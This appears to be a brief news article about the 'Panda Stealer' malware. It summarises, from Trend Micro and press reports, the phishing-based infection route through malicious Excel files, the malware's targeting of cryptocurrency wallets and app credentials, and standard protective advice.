Panda attacks on crypto wallets

I’m not talking about attacks by a cuddly black and white bear from China, but instead a series of new ransomware attacks. The ‘Panda’ malware has been targeting cryptocurrency wallets, “along with account credentials from other applications such as NordVPN, Telegram, Discord and Steam,” according to a Coindesk report.

Trend Micro, a cybersecurity company, discovered the malware that steals information and dubbed it ‘Panda Stealer’. The malware has been found targeting individuals across countries including the US, Australia, Japan, and Germany.

The malware begins its infection chain through phishing emails that pretend to be business quote requests.

According to ZDNet, two methods have been linked to the campaign: the first uses attached .XLSM documents that require victims to enable malicious macros.If macros are permitted, a loader then downloads and executes the main stealer. 

In the second method, “an attached .XLS file contains an Excel formula that hides a PowerShell command. This command attempts to access a URL to pull a PowerShell script to the victim’s system and to then grab a fileless payload.”

Once downloaded, Panda Stealer will attempt to detect keys and addresses associated with cryptocurrency wallets holding funds including Ethereum (ETH), Litecoin (LTC), Bytecoin (BCN), and Dash (DASH).

Trend Micro researchers who discovered the attack said, “Crypto wallets are now as big of a target for online theft as banking accounts are. With more people getting into cryptocurrencies and the values of said cryptocurrencies still increasing, this will only become a greater threat moving forward.”

They also pointed out that there is more risk here as unlike theft via a bank or a credit card, there may not be a central authority that can undo malicious transactions. Once you lose your money and the transaction goes on the blockchain, it’s likely gone forever.

“None of this is particularly novel in and of itself – malicious Office documents are well known, so is fileless loading,” Trend Micro researchers said. “The main “new” aspect here is the target of the data theft.” For example, attackers are setting their sights on applications like Discord and Telegram – popular communications platforms for cryptocurrency communities. 

Even if this type of attack is new, Trend Micro recommends following standard security practices, such as not opening up attachments sent via email, making sure you don’t click on unknown links, and keeping software up still are basic security measures people can take to avoid malware and other security breaches. They added that the best advice is to secure your cryptocurrency wallets and recommended using strong, unique passwords, and commented, “For investors who are more interested in holding cryptocurrencies for the long term instead of actively trading them, the use of hardware-based/offline wallets may well be safer, if less convenient to add to or sell from.”

Scroll to Top